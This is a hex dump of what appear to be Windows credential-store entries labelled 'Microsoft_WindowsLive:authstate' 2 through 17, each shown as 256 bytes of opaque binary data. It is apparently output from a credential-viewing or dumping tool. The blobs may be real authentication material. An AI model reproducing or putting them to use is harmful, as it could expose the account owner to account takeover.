0000 D6 C3 30 52 12 E5 27 2A 36 B8 9C 7E E2 A5 81 1C ..0R..'*6..~....
0010 A3 98 A5 98 54 FA FF 1B A5 C6 2E BB C0 21 4B DF ....T........!K.
0020 3A 4D 27 FC DA F4 1F B2 D1 56 74 6B 0A 67 86 CA :M'......Vtk.g..
0030 C7 E8 74 AE 1B 31 59 EA 9A 37 09 59 15 98 BF C2 ..t..1Y..7.Y....
0040 41 BA 60 1C 72 60 75 C9 4E 53 10 50 19 11 51 B5 A.`.r`u.NS.P..Q.
0050 82 86 B6 B4 FC 71 5C 4A 2A 2F 7F BB 4C 27 9E 63 .....q\J*/..L'.c
0060 DA 85 C0 43 19 18 53 A3 8D 39 F0 AA 40 67 26 A1 ...C..S..9..@g&.
0070 17 ED F5 75 AA FD 60 39 8B 09 1A 4B D8 68 43 BD ...u..`9...K.hC.
0080 BD 5A BE CF A2 34 1A 76 90 C6 67 5B AF 48 07 1C .Z...4.v..g[.H..
0090 A7 78 66 A5 D3 A4 D7 A9 0A E6 3C 8B 4C 52 41 5E .xf.......<.LRA^
00a0 30 74 03 32 23 59 E3 B4 80 31 31 D6 2E 46 A1 1B 0t.2#Y...11..F..
00b0 6A A9 C2 F2 EA EB FD 63 CF D9 3B 18 A6 DB 64 20 j......c..;...d
00c0 E5 BE 09 7F 27 F1 86 FB AB 84 AF B1 2C DD 54 B7 ....'.......,.T.
00d0 87 38 33 3F BF 6C AB 55 E8 CB 3F 95 21 42 6A B2 .83?.l.U..?.!Bj.
00e0 3E 71 3F 17 E7 BE 8D C2 2D 30 AF 68 85 3A 8D FE >q?.....-0.h.:..
00f0 4E 99 DF 28 81 55 25 78 98 67 EB 09 B5 9C 38 43 N..(.U%x.g....8C
KeyWord : Microsoft_WindowsLive:authstate:2
Data :
0000 99 81 14 2B AC 38 80 5B 44 E0 B8 0D 4E 91 EB CE ...+.8.[D...N...
0010 E5 B7 B5 89 2C 76 65 0E 15 17 83 1E F5 76 40 F3 ....,ve......v@.
0020 D9 9C FF 6F 71 B9 91 42 BC 10 76 A7 18 DA E5 CB ...oq..B..v.....
0030 4D 3B A4 F2 AA E3 8D 1F 29 ED AD 6E 38 A9 69 CC M;......)..n8.i.
0040 00 CF 84 12 04 72 D8 DA A3 E1 B5 9B 27 5F C5 CD .....r......'_..
0050 64 4D 17 EF B3 7D DF 25 4D F1 AC 04 FB D0 53 12 dM...}.%M.....S.
0060 52 70 7A F2 90 84 07 09 18 AD 47 29 BB 8F CF 22 Rpz.......G)..."
0070 8A 76 2B 64 DD 36 14 61 F1 CC F6 1F C3 32 F5 25 .v+d.6.a.....2.%
0080 A2 1A FB 6D 3B 6E 31 76 E7 22 87 1A C0 73 44 48 ...m;n1v."...sDH
0090 4B 62 AC CA 9F FF DD FA 95 BE 87 5E EC EE 88 C4 Kb.........^....
00a0 47 3D 74 1D 0B EA 5A 02 CD 06 D7 91 98 89 F7 06 G=t...Z.........
00b0 6C C5 8C 40 F0 77 53 17 A3 52 52 C3 AB 4F F9 C5 l..@.wS..RR..O..
00c0 84 73 09 FE 00 77 A6 D2 4B 89 04 09 F9 53 4D FB .s...w..K....SM.
00d0 82 CF 39 E5 4D BA 87 47 F5 90 02 22 F3 75 41 07 ..9.M..G...".uA.
00e0 72 8C 62 6B 8D 65 41 6E 01 53 13 11 93 86 7C 73 r.bk.eAn.S....|s
00f0 9F 93 AC B1 0E 64 56 CA 82 E4 1C 57 5C AA C0 EE .....dV....W\...
KeyWord : Microsoft_WindowsLive:authstate:3
Data :
0000 88 43 69 38 BF BA 83 D7 B8 2A 50 0E D8 D4 73 A4 .Ci8.....*P...s.
0010 99 FA EE F4 57 1D 6F E0 E1 9A 47 5E 9F A6 99 F4 ....W.o...G^....
0020 4B 61 4C BB 77 37 4A E4 28 06 00 28 7D CA FB AB KaL.w7J.(..(}...
0030 4C FA C9 0E 8B 63 25 92 7E 83 1D DF 84 2D 4E A1 L....c%.~....-N.
0040 38 C0 C5 56 60 6A 70 EE BD 78 8A C6 6A 3A A9 33 8..V`jp..x..j:.3
0050 14 E8 FF F6 11 D8 DF 22 CF 49 1C 3F 8F 63 D5 49 .......".I.?.c.I
0060 9F CE D6 DF FB D2 C4 F3 35 DD CE 3B F7 4B B6 37 ........5..;.K.7
0070 11 AB D4 FE FF 34 07 48 05 50 0F F2 4D 8C 57 6E .....4.H.P..M.Wn
0080 D0 8D 77 CF 5E A0 83 61 CE C4 A9 2B 7F B3 2F CC ..w.^..a...+../.
0090 84 32 A3 49 C7 99 A4 8C 74 52 BD 88 A8 6B E8 51 .2.I....tR...k.Q
00a0 DB 33 0F 37 A7 74 D9 00 1E 47 73 24 B1 5B 55 B4 .3.7.t...Gs$.[U.
00b0 93 3A 8C 6C E8 C2 10 58 3B FA E4 76 77 F4 4A 7C .:.l...X;..vw.J|
00c0 69 67 39 1C 4C 29 46 18 61 21 AD FA BF 7E 95 49 ig9.L)F.a!...~.I
00d0 37 06 52 E9 B3 FC 99 B5 DC 0E 42 05 AB 10 37 D0 7.R.......B...7.
00e0 3B 04 DD 93 E0 E4 DA D8 A6 AD AA C7 45 86 C2 47 ;...........E..G
00f0 15 47 EF 10 8C D6 D9 F1 1B AC 71 C8 65 54 99 08 .G........q.eT..
KeyWord : Microsoft_WindowsLive:authstate:4
Data :
0000 B1 EB 98 66 C3 74 3C 70 29 36 56 83 1A 4C 4E 81 ...f.t<p)6V..LN.
0010 20 78 95 9F 1B 4E 95 6A 8C EE 6B 17 20 92 5E 38 x...N.j..k. .^8
0020 B6 D6 C6 21 5F A0 0C A7 D8 B9 0E 3B 3E 92 09 31 ...!_......;>..1
0030 5A 90 9D 44 96 2A DC FD 4F 27 05 E4 15 DA BB 93 Z..D.*..O'......
0040 CE F8 0E FC E2 83 BC 1C 24 9E E4 0E 0C 3E 3F B0 ........$....>?.
0050 BC 06 6F 3A 9B 22 2B 2E 29 93 93 71 D8 EF 29 59 ..o:."+.)..q..)Y
0060 F7 EF 21 AD 9C D4 0A 5C E2 02 B2 2E 21 E2 E8 F8 ..!....\....!...
0070 94 D1 D6 54 37 C0 E2 3A DC 67 ED 1C B1 D8 B2 BB ...T7..:.g......
0080 7B 77 EF 1E DB 82 0B 6E 28 A3 A5 57 1B 40 AD 7C {w.....n(..W.@.|
0090 1F 65 64 69 1D B2 A0 4B 87 C9 EB A7 C9 1B F6 B0 .edi...K........
00a0 2D 3C C8 3C E4 1D E3 03 EF D5 05 81 B8 ED 2E 60 -<.<...........`
00b0 BE 54 E4 C8 FC 93 02 90 85 3C EE 92 3B 08 EE 81 .T.......<..;...
00c0 2B 31 D4 DA CF 35 67 C1 2B C6 19 95 6D DA AA E0 +1...5g.+...m...
00d0 35 B1 16 B3 08 98 66 4A 8C D5 6B 23 0A 7C EC 7A 5.....fJ..k#.|.z
00e0 84 31 67 1E D8 1F 6C DC 59 20 73 32 9E 06 A3 03 .1g...l.Y s2....
00f0 0F 70 69 9C 00 76 C7 C0 33 E8 79 A3 01 4A ED 59 .pi..v..3.y..J.Y
KeyWord : Microsoft_WindowsLive:authstate:5
Data :
0000 9F 8D 74 B3 25 BE B0 17 6F 79 66 58 A0 E1 22 54 ..t.%...oyfX.."T
0010 A0 D5 3C 87 BA 2F 48 4D FF 40 DA 8A 6A BD 68 BC ..<../HM.@..j.h.
0020 3A 5E 01 83 6B C5 35 4A 93 8B 64 16 C3 40 69 E2 :^..k.5J..d..@i.
0030 12 C8 1C 20 1B 8C 24 D8 50 3A B9 13 C8 67 5D 77 ... ..$.P:...g]w
0040 F1 69 AA 3D 44 ED 57 76 8B 4D B8 7B 1F 4A BD 1F .i.=D.Wv.M.{.J..
0050 A9 40 85 4A 93 29 72 3D 31 56 85 FE 63 54 B4 4B .@.J.)r=1V..cT.K
0060 F8 D6 8B 52 B1 EE FE D4 98 FE 46 55 7B 04 7D 01 ...R......FU{.}.
0070 8A 1C E1 E5 27 2B 46 D8 29 A1 34 E7 FC FB 0E C5 ....'+F.).4.....
0080 D2 8C A4 8F 60 B1 DE CF F0 EC 6D 9B 2F 9F 44 FF ....`.....m./.D.
0090 F5 23 91 FC AC 83 FF C4 A5 C3 95 6B CE CC D6 A9 .#.........k....
00a0 76 31 74 01 F9 70 2A DA E4 7F 63 62 11 0A 57 75 v1t..p*...cb..Wu
00b0 6F 9E 4F 31 A3 AF 32 FE 7C E5 0C D3 BF D0 19 5B o.O1..2.|......[
00c0 FA 22 6B F6 73 B1 44 E4 BA 10 B7 E7 39 DC 3D 5B ."k.s.D.....9.=[
00d0 B2 B4 A2 0C 72 F4 E5 26 BA 00 98 02 3C 31 8C 41 ....r..&....<1.A
00e0 4C C5 DD C4 4D 03 A3 81 6B A5 03 A6 4F B1 4A BF L...M...k...O.J.
00f0 5F 12 26 60 13 4A 69 33 61 34 C8 86 F8 C6 8C 70 _.&`.Ji3a4.....p
KeyWord : Microsoft_WindowsLive:authstate:6
Data :
0000 C0 27 E2 AB C7 62 67 3A 8C DA 97 E8 70 C0 21 D0 .'...bg:....p.!.
0010 A0 F1 3C 55 F8 11 0C 8F A5 C9 02 A3 EB D5 16 FE ..<U............
0020 7A 81 03 DA 0C F5 3C 11 75 15 F2 B9 74 3F 6E 11 z.....<.u...t?n.
0030 FB 76 49 CB 24 D8 B0 DA 3A E4 92 C2 FA 8B F4 48 .vI.$...:......H
0040 55 7A EC 84 E7 58 5B AB D7 21 26 5F 35 27 81 19 Uz...X[..!&_5'..
0050 F8 D6 C2 42 F8 DB 26 07 E9 FA 12 CF B0 4E E3 BC ...B..&......N..
0060 79 DB 41 75 F8 5D B1 00 9A 62 77 25 94 A2 D7 32 y.Au.]...bw%...2
0070 96 AF 33 BA C4 4F DA 84 FC 78 1D D9 63 EC 53 4C ..3..O...x..c.SL
0080 AE 0B 96 5C F4 8D 3A E2 50 EB 32 F6 A1 11 EF FE ...\..:.P.2.....
0090 B6 CB 0F 5D 65 FF BF E9 2C 44 57 E4 03 13 4B 47 ...]e...,DW...KG
00a0 5D ED AD F3 3A 28 79 0F 45 15 50 F6 8D 0B 03 1E ]...:(y.E.P.....
00b0 45 E7 E1 A7 96 58 61 DC B0 0F DF 13 9D 98 01 19 E....Xa.........
00c0 1C 77 85 D1 FE 6C FA BA ED 93 C5 F9 90 DB 14 CC .w...l..........
00d0 A9 CE DC 61 48 C7 8A 32 79 91 26 08 B8 AC 80 C4 ...aH..2y.&.....
00e0 2E 9D E8 BE 51 B1 75 7F 55 27 C2 F9 51 2A E8 35 ....Q.u.U'..Q*.5
00f0 17 71 DD 9D 0D F5 75 B4 B7 1F 93 8C C5 42 59 29 .q....u......BY)
KeyWord : Microsoft_WindowsLive:authstate:7
Data :
0000 EF C2 B4 38 48 AD B8 0C 6B AD 63 A0 71 26 9F 1F ...8H...k.c.q&..
0010 33 C4 70 5B 45 63 6D F4 FD 99 E5 17 64 55 BF 92 3.p[Ecm.....dU..
0020 90 C1 F9 47 68 C4 8C FB 9D C9 F8 FC 3C 04 11 59 ...Gh.......<..Y
0030 46 FE FC 7F C2 B3 56 53 59 03 E6 31 F0 D2 35 FC F.....VSY..1..5.
0040 84 C2 AE FA 8A 64 32 CC 94 BC B5 62 7A 52 4C BD .....d2....bzRL.
0050 D4 EC C0 4A 05 57 35 66 C6 3D A1 2C 43 10 1C D4 ...J.W5f.=.,C...
0060 11 B5 DC 06 B7 18 88 8B BE 82 69 76 37 B6 20 89 ..........iv7. .
0070 23 CA 85 5A 77 23 44 CF 3D 0C FD A3 13 62 11 13 #..Zw#D.=....b..
0080 80 8B 94 0F DF C5 FD 76 E5 C1 FA 10 C4 E9 D1 1E .......v........
0090 17 5F 60 A7 10 67 21 50 3C 23 0E B0 A9 4A 94 12 ._`..g!P<#...J..
00a0 50 2C 03 71 6F 84 27 B6 9B 9D 61 AF 8E 32 78 B0 P,.qo.'...a..2x.
00b0 4E 13 A5 4F AB 3E 84 0E 1F 86 38 AE 07 7D 84 E6 N..O.>....8..}..
00c0 3A FF FC 41 6C B7 05 32 F1 3A 1E 50 B4 B7 8D 8C :..Al..2.:.P....
00d0 9B 8C 3D 63 38 88 4E DE 2E C8 EA 70 83 99 7A 75 ..=c8.N....p..zu
00e0 EC 65 F6 DE 6B 56 E2 82 DF 81 E3 46 A0 67 56 97 .e..kV.....F.gV.
00f0 00 EA 4C 94 A8 81 07 05 F8 12 D9 01 89 6D 2D 2B ..L..........m-+
KeyWord : Microsoft_WindowsLive:authstate:8
Data :
0000 36 72 1A C0 CE 5A CF 4A 3B B4 77 CF 52 F1 AD 35 6r...Z.J;.w.R..5
0010 94 96 3B D5 34 97 85 78 7E CE 77 30 0A C1 B8 F6 ..;.4..x~.w0....
0020 A6 1B EB 72 76 7B A9 C2 82 95 0F BC 36 7F 85 8B ...rv{......6...
0030 E5 1D 9B 32 03 E8 92 59 31 B2 01 AD 31 47 FA 96 ...2...Y1...1G..
0040 A0 55 68 66 1C E3 CC 71 6A 3F 4C 55 3E 02 FD BA .Uhf...qj?LU>...
0050 FC F1 3D A5 B9 58 56 64 CD 6A 7E BC EC 3C 5E 24 ..=..XVd.j~..<^$
0060 0A 43 25 C4 1D 79 F7 A7 F0 2A 5A 00 CE BF 40 89 .C%..y...*Z...@.
0070 99 74 C6 FC 09 27 77 F9 DB D4 99 A9 A5 D5 71 E1 .t...'w.......q.
0080 CB 6B 30 53 C0 4C A7 7A F1 2F 3E D6 6E 4D 72 7F .k0S.L.z./>.nMr.
0090 CF A3 23 85 E6 94 C7 14 BF 00 5E D1 68 DC 79 A5 ..#.......^.h.y.
00a0 EC F5 FF 3C 61 FB 0B BE 7C 77 0D 0E 21 86 EF 9D ...<a...|w..!...
00b0 B4 D7 38 E5 D4 C1 76 1F 5F B2 73 15 65 ED 86 48 ..8...v._.s.e..H
00c0 FB 46 35 24 D6 7C A1 61 E9 81 38 54 19 E3 76 C3 .F5$.|.a..8T..v.
00d0 CB C4 B8 0E BE D5 89 4F 1B E3 09 DF 06 67 BB E5 .......O.....g..
00e0 60 CA 00 60 AA 8F A3 C2 A2 43 DB 20 5D 96 F8 F7 `..`.....C. ]...
00f0 1B DC F1 1A 6B 34 0F 56 DB E9 78 5B 65 9A AF 2C ....k4.V..x[e..,
KeyWord : Microsoft_WindowsLive:authstate:9
Data :
0000 D2 58 08 0C CE 7D 5C C7 11 F0 8F 6E 02 20 80 1E .X...}\....n. ..
0010 33 3F D3 2F 47 9E F4 6F FA 84 54 BA E5 C2 D9 97 3?./G..o..T.....
0020 60 D5 5A E6 EE 32 1D 4C BC 09 CB BA 2A 40 83 1F `.Z..2.L....*@..
0030 1A FC A5 E9 26 D1 87 54 D9 76 31 A1 CB 7E C3 0C ....&..T.v1..~..
0040 73 81 4B 2D CC 68 BE 3C F7 96 74 42 C0 9F D0 AC s.K-.h.<..tB....
0050 B7 9D 48 90 DC DB E9 32 92 4F 54 D4 9A 76 F4 1C ..H....2.OT..v..
0060 3F 90 51 C5 1D FE 49 AA 12 AC 62 47 AB CE DA 68 ?.Q...I...bG...h
0070 0C A1 DC D9 38 59 F0 37 DA 66 23 62 EC ED 23 CE ....8Y.7.f#b..#.
0080 75 00 14 03 0E B6 3F C0 1C 07 F4 9B C7 3D 8B F7 u.....?......=..
0090 38 7B 31 CB 63 FF 01 B7 B8 90 60 E9 34 B0 16 7E 8{1.c.....`.4..~
00a0 D6 1B B9 F7 E7 F2 9D 22 06 FC 0A 1E 3C F5 78 E2 ......."....<.x.
00b0 A3 00 3C 88 68 E8 88 BF 20 86 AE EB C7 BB 37 79 ..<.h... .....7y
00c0 75 01 F8 2D 05 88 D8 79 18 CC 50 0C F9 02 A3 4F u..-...y..P....O
00d0 46 76 44 6D C9 19 46 D2 B2 54 DE CE CC B6 03 51 FvDm..F..T.....Q
00e0 FE ED E2 CE 46 B8 C0 58 B4 54 D3 01 55 B4 72 45 ....F..X.T..U.rE
00f0 E7 AC 19 4A 88 36 47 09 F4 E6 64 BD 86 06 DE 98 ...J.6G...d.....
KeyWord : Microsoft_WindowsLive:authstate:10
Data :
0000 D5 D4 CB 3E 40 ED 4E 66 5F 3B 14 35 6A 48 E8 66 ...>@.Nf_;.5jH.f
0010 05 05 D9 AC 4D A0 51 6B 22 8B A7 45 45 5B 5D 64 ....M.Qk"..EE[]d
0020 44 0C 59 C9 C4 BB 00 90 C6 AD 8F CF 49 65 01 4F D.Y.........Ie.O
0030 CF E2 7A 9C C2 B1 59 E3 A5 EB 58 3C AA 15 4E 81 ..z...Y...X<..N.
0040 A5 89 C3 5D 62 77 82 51 0E 95 52 B0 16 61 92 A9 ...]bw.Q..R..a..
0050 A9 6A B4 6C 10 D9 27 AB 1B 9E 2D F0 F6 36 53 E8 .j.l..'...-..6S.
0060 CD E0 A1 73 D3 7C F4 42 B8 5A D2 6A 86 F6 62 4A ...s.|.B.Z.j..bJ
0070 1E E0 94 C0 2C C4 6F 5C F8 32 09 A0 11 BD 16 8A ....,.o\.2......
0080 CA 00 42 E0 31 6C 08 30 E1 5D D0 FD 74 0A 90 A3 ..B.1l.0.]..t...
0090 57 EC 88 EA FC 42 09 AF EC BA B7 DC EA 58 13 F0 W....B.......X..
00a0 E1 F6 3C 86 46 30 5E EF 34 78 5C E0 C0 E4 08 AA ..<.F0^.4x\.....
00b0 51 16 B6 F8 41 5D 36 BC 5B 8F 12 62 26 A6 C1 0E Q...A]6.[..b&...
00c0 EC 79 11 10 06 71 E5 1B F6 02 EF F3 30 06 A1 85 .y...q......0...
00d0 D9 25 B9 B3 F7 F4 64 4F 50 AE D8 09 71 2B 0F 89 .%....dOP...q+..
00e0 69 79 32 53 BA 8C 71 02 F1 51 D7 C2 0E 0C 48 37 iy2S..q..Q....H7
00f0 F3 3C 24 78 D9 60 9A 5D 9A EA 08 41 BB 27 E3 90 .<$x.`.]...A.'..
KeyWord : Microsoft_WindowsLive:authstate:11
Data :
0000 51 02 80 03 08 27 61 A1 79 79 3E DC E3 65 E0 47 Q....'a.yy>..e.G
0010 51 54 F9 FF EB 34 B8 AD 7C C7 AB 07 96 21 6C AB QT...4..|....!l.
0020 70 5A 91 BE 09 4B DE 94 94 BE 39 63 82 B5 09 EF pZ...K....9c....
0030 7D 23 FA 7A D2 D1 6E 4E 32 28 1D 83 A7 CE C7 6A }#.z..nN2(.....j
0040 D1 57 90 D3 76 1A 3F 26 10 8D C9 E9 68 0C 89 01 .W..v.?&....h...
0050 9C 7B 16 38 55 13 9A 98 3C 16 BA EA BD 48 9C 8C .{.8U...<....H..
0060 3D C3 A0 DD D3 E1 C7 81 63 A9 05 FF 64 BF EA 0D =.......c...d...
0070 5A A3 2E B2 F0 60 53 EB A1 9D 8E 5E CE E5 8F 03 Z....`S....^....
0080 EC 46 5F FF 5E 8E 6C 77 A4 2A AB F2 D9 95 7D F5 .F_.^.lw.*....}.
0090 90 E4 46 C8 13 DF A9 B6 B2 EE E9 C6 2C 41 08 00 ..F.........,A..
00a0 55 D1 97 55 AD B4 C8 1D 08 19 98 33 B0 80 F1 13 U..U.......3....
00b0 C8 53 DB 7E 7A E5 B7 E7 2D 63 FB 1D BB D7 87 A0 .S.~z...-c......
00c0 A8 75 1D 12 72 BC 51 22 A0 B4 94 79 CC 11 53 D6 .u..r.Q"...y..S.
00d0 89 45 E7 FD 93 B6 44 27 48 8D 82 48 07 24 0C D7 .E....D'H..H.$..
00e0 16 41 E3 D6 C9 3A F7 92 83 8A 91 75 8D 23 D1 B0 .A...:.....u.#..
00f0 CA F0 AE 2C 0E DC 1D 73 C8 B9 EC 50 04 5E 6E BE ...,...s...P.^n.
KeyWord : Microsoft_WindowsLive:authstate:12
Data :
0000 9C C7 AC F7 34 42 35 24 08 DA D8 72 D0 35 51 F0 ....4B5$...r.5Q.
0010 6B 48 E2 93 DA 8F BB 35 26 86 54 3A B1 39 19 83 kH.....5&.T:.9..
0020 16 D9 BD 88 D4 B1 7C B8 16 9C D1 53 B5 E7 4C DE ......|....S..L.
0030 99 A7 A8 BF 9B 16 9C 3D 1A 7A 9F 00 7C B1 6F D3 .......=.z..|.o.
0040 17 19 66 23 BE 6D B2 F0 46 5E BB 4F FF 22 01 6B ..f#.m..F^.O.".k
0050 91 14 26 FA 13 0C 41 7A 08 12 21 8C 1D 56 42 F2 ..&...Az..!..VB.
0060 AE E5 41 EF 27 E6 3F E9 BC 91 E7 69 32 BE 5E 12 ..A.'.?....i2.^.
0070 1A F1 FB 70 78 E3 A1 DD 67 85 4F 35 BF 1D 75 6C ...px...g.O5..ul
0080 83 8E 5C 44 AE 77 49 1E 4D 8D 20 9E 50 82 D1 B4 ..\D.wI.M. .P...
0090 86 F9 2D BD A2 9E B2 9F BF FA 8F 4A B8 ED 64 24 ..-........J..d$
00a0 73 24 F5 A7 5D DB F6 18 C2 E6 15 D4 21 12 3F DD s$..].......!.?.
00b0 E9 3E A4 79 3F D1 01 42 F0 7F 88 2F A2 3C 6D C7 .>.y?..B.../.<m.
00c0 97 9B 46 C5 9F 94 6C 38 97 08 E3 0A 44 39 9B 8D ..F...l8....D9..
00d0 A8 DB C8 01 96 1F DE C9 92 57 5A 4E 45 0C 0F E2 .........WZNE...
00e0 99 68 16 DE 7B 7B 2E 1B 6D 69 31 75 EE F0 4A 35 .h..{{..mi1u..J5
00f0 21 2C 69 EE F0 89 DE 9E EE 17 55 B9 E0 E7 63 7A !,i.......U...cz
KeyWord : Microsoft_WindowsLive:authstate:13
Data :
0000 80 64 33 20 BB 82 BE 2E 8E F4 FB EE 6E 81 DA 02 .d3 ........n...
0010 AF 20 B4 DF D1 BB E4 24 CD 2E DD 05 83 03 48 C2 . .....$......H.
0020 F5 7F BC 96 CD EA FD A3 1C 55 E6 80 97 75 DA 71 .........U...u.q
0030 81 75 E2 75 7B 88 57 5E 59 EF 5A 13 E4 C3 F0 C1 .u.u{.W^Y.Z.....
0040 C5 B2 6C EF 19 B6 5A 19 77 28 D6 7A 04 0E 32 78 ..l...Z.w(.z..2x
0050 3F 23 A0 CF 0D 81 D4 E3 F3 8B CB CD B5 B5 66 B6 ?#............f.
0060 D0 90 C3 EE 26 36 80 9D 01 30 50 E9 58 73 71 05 ....&6...0P.Xsq.
0070 A2 FB 63 8A EB 7C FD 6E E9 62 47 36 E8 0B 6C EC ..c..|.n.bG6..l.
0080 9B F3 9E DA A1 98 5C CB 4D 9E A4 BF C4 EF CB 46 ......\.M......F
0090 B1 16 1F 24 2D 8E 24 21 68 F2 7D F5 76 2B D0 CA ...$-.$!h.}.v+..
00a0 B7 5E 05 81 D0 47 29 07 94 C1 6D 45 7E 63 8E 5D .^...G)...mE~c.]
00b0 5E 43 6D 63 B8 0F 98 BA 6A AF BA 53 C1 E9 6E 15 ^Cmc....j..S..n.
00c0 56 58 F2 10 1D C2 F3 3B D9 68 72 89 41 B2 ED FC VX.....;.hr.A...
00d0 11 71 44 CA 5F E7 38 E4 4D CA 66 3D 87 23 36 BD .qD._.8.M.f=.#6.
00e0 EC 0A 79 22 CB 8E 0C 2F B4 DF 0F E7 4C 45 E6 C1 ..y".../....LE..
00f0 A4 E3 DF 49 74 72 A8 A7 39 13 C8 C4 EC 0B 37 C1 ...Itr..9.....7.
KeyWord : Microsoft_WindowsLive:authstate:14
Data :
0000 DA E0 8E D0 29 C5 1F D1 6B A9 90 40 58 31 F1 06 ....)...k..@X1..
0010 0E D9 1C 18 88 42 D2 65 C3 96 F9 CA 3F 6D 12 3D .....B.e....?m.=
0020 A5 EB CA 5D A6 02 97 FC 3D 19 48 5C 16 86 AF C5 ...]....=.H\....
0030 13 B2 80 C2 E9 E1 7A C7 93 B2 B5 C6 1A 74 A1 F5 ......z......t..
0040 40 8B 45 52 AA 98 04 08 FB D7 BF 6A AD 4E 8D D9 @.ER.......j.N..
0050 0E 8D 55 18 C3 6C EB 6C 32 60 84 BA D8 5D 47 22 ..U..l.l2`...]G"
0060 35 E0 5D B6 96 0B FA 27 57 86 D4 CC C5 59 4C 94 5.]....'W....YL.
0070 22 44 99 1D 4B 61 8E 5E F6 C4 C9 74 F4 9A 85 E5 "D..Ka.^...t....
0080 5D 5F 7D 0E 52 EB BC 4C 51 41 9B 97 22 4E 53 CB ]_}.R..LQA.."NS.
0090 BE 9B B1 3C 4A 65 BF 32 B1 0D D0 9E 67 D0 A6 27 ...<Je.2....g..'
00a0 65 62 86 9C 8A 04 08 71 B9 64 BA FA AC 62 15 FA eb.....q.d...b..
00b0 1B 10 19 70 8D 5C 8A BD EA EC AC 1F DE 12 4F EE ...p.\........O.
00c0 1E 73 84 CB 7B 98 E0 CF 6F 31 AB F6 55 04 14 59 .s..{...o1..U..Y
00d0 5F 76 BC 4D AE 49 9E 27 C7 75 1F 73 65 66 CE B1 _v.M.I.'.u.sef..
00e0 75 C2 BF E9 3F 8C 91 16 49 53 51 58 95 9E CD 5A u...?...ISQX...Z
00f0 83 F0 83 88 96 E1 F2 01 48 2D 14 EA 0C E7 C2 29 ........H-.....)
KeyWord : Microsoft_WindowsLive:authstate:15
Data :
0000 9B C6 7F E3 85 B0 7D A6 5B 4B 07 E4 D4 80 D3 01 ......}.[K......
0010 DA D2 2E 45 B9 EC 9C F3 1A 54 56 FA B5 FC C3 63 ...E.....TV....c
0020 CB 9C 36 11 79 3F 8B 0B 4C AC 8F B5 CB 86 6B E2 ..6.y?..L.....k.
0030 09 B6 3B 77 B2 CA 54 37 B5 88 5F 52 77 7B 21 A3 ..;w..T7.._Rw{!.
0040 5C 07 12 8B 14 43 B6 55 3B 8D 50 26 BC CF 81 36 \....C.U;.P&...6
0050 07 0F 89 B8 86 83 AC BC D8 A5 C7 A4 3F 87 DB B9 ............?...
0060 C9 78 C9 2D 14 AE 8D CA 0D 09 6F AB 1D 98 60 F0 .x.-......o...`.
0070 B6 2E 8D D4 EC F8 4A B1 35 4B A4 83 36 D9 81 88 ......J.5K..6...
0080 63 CF 22 18 E7 27 7A BA A8 56 E9 E1 24 40 17 83 c."..'z..V..$@..
0090 FE 11 14 E2 D7 7C 7C FA 46 6C 02 2C D6 ED 16 AB .....||.Fl.,....
00a0 3F D1 97 A1 C6 B5 B2 A1 FC BD C4 40 43 2E 49 9D ?..........@C.I.
00b0 B4 96 03 8D 1D EE 18 F8 68 26 77 35 D3 5A 90 12 ........h&w5.Z..
00c0 32 24 4D 89 73 DF E9 5D B0 AA D8 80 A9 05 EE 19 2$M.s..]........
00d0 8B 9F CC 01 D2 FF E6 83 A1 42 E7 C4 3F 9D C5 E9 .........B..?...
00e0 FB 58 8D 52 A5 08 6C 53 FD 4B 29 F5 9F 31 91 7C .X.R..lS.K)..1.|
00f0 1E AF A3 55 23 69 A4 95 46 6E CF A2 E4 7C BC 38 ...U#i..Fn...|.8
KeyWord : Microsoft_WindowsLive:authstate:16
Data :
0000 78 E0 28 E0 E4 F2 3C 38 39 10 94 EE C2 00 4C 50 x.(...<89.....LP
0010 AD F4 C6 DB 54 A6 BA 74 6F E7 E3 88 09 A0 59 8F ....T..to.....Y.
0020 69 71 73 18 EE B0 BA E3 7B D6 64 24 A1 C4 61 93 iqs.....{.d$..a.
0030 7B 79 D0 EC 64 42 57 10 47 FC 9D 68 40 F8 AA 76 {y..dBW.G..h@..v
0040 50 66 34 C0 DE 64 E0 03 EE 28 5C A4 99 FC 94 1E Pf4..d...(\.....
0050 E7 94 8E EE 9A 00 00 47 2D DF D9 46 37 65 E3 E5 .......G-..F7e..
0060 DF 6D CD 02 C4 11 C8 6B BC 4B 94 B0 B5 09 0C 66 .m.....k.K.....f
0070 E2 D1 37 1D 80 43 22 97 6F D6 FC 91 C8 00 83 74 ..7..C".o......t
0080 C3 60 78 34 98 9D C3 6C BC D1 56 A9 A8 02 09 CA .`x4...l..V.....
0090 7B A3 0B 36 7E 65 58 41 DF 52 61 27 1F 21 00 49 {..6~eXA.Ra'.!.I
00a0 4B 87 9F E9 AD 16 EC 9C 23 CB 43 9F EC 3D 9E 94 K.......#.C..=..
00b0 20 9B 52 5C C7 0A D7 D3 49 11 47 71 E3 56 C9 6C .R\....I.Gq.V.l
00c0 C4 56 EB E4 70 64 68 CC 57 B3 3E 19 38 2F CA F7 .V..pdh.W.>.8/..
00d0 A4 2C F0 64 B5 9E 4D 15 98 7D 26 73 FA B9 AF 35 .,.d..M..}&s...5
00e0 85 B3 A4 70 D6 30 8D E0 13 16 4D F5 9B 36 A2 4C ...p.0....M..6.L
00f0 A3 7D C7 EF 23 24 F6 30 BF CF 68 C2 33 61 FC 64 .}..#$.0..h.3a.d
KeyWord : Microsoft_WindowsLive:authstate:17
Data :
0000 6E 66 F9 C7 64 B0 98 34 FC 45 61 1C EB B3 A3 00 nf..d..4.Ea.....
0010 A3 57 D5 E7 90 F3 43 DD DD 13 B1 99 F2 93 9F 39 .W....C........9
0020 AB 92 BB A7 61 A2 9C 78 F1 35 61 CA 9E 25 8B 92 ....a..x.5a..%..
0030 19 5D 6C E4 D5 57 9D C6 DF C0 69 3F A9 DB E3 06 .]l..W....i?....
0040 91 C2 68 42 D9 89 83 B2 21 AD 09 AA 27 9A 9C 9E ..hB....!...'...
0050 2D FD 3D 64 9F 7C 5D 6F 32 45 C2 3D D3 FB 2F 97 -.=d.|]o2E.=../.
0060 71 12 EF D5 03 5A 09 82 E4 79 1D DD F7 04 54 49 q....Z...y....TI
0070 C2 70 62 9B 32 7E 19 86 53 2E 5E 69 D3 40 2D 03 .pb.2~..S.^i.@-.
0080 B3 F8 4F E5 6F A5 6E D8 C4 8D 92 5D FA 7D 89 37 ..O.o.n....].}.7
0090 22 DF F4 65 53 E3 3F 2F 28 F6 FB 75 97 84 5D C7 "..eS.?/(..u..].
00a0 08 31 0C 29 83 DD 91 1B 46 49 C9 FF 39 92 BD 8C .1.)....FI..9...
